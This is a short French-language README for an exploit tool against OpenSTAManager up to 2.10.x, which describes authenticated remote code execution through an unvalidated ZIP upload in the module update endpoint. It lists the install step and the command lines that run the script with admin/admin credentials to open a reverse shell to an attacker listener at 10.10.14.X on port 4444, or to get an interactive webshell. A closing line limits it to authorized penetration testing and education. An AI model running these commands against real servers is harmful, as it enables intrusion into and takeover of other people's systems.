
Exploit d'exécution de code à distance authentifié pour OpenSTAManager via un téléchargement ZIP non validé, offrant un reverse shell et des capacités de webshell interactif pour les tests d'intrusion autorisés.
RCE authentifiée via un téléchargement ZIP non validé dans le point de terminaison de mise à jour de module.
Affecté: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
Pour les tests de pénétration autorisés et à des fins éducatives uniquement.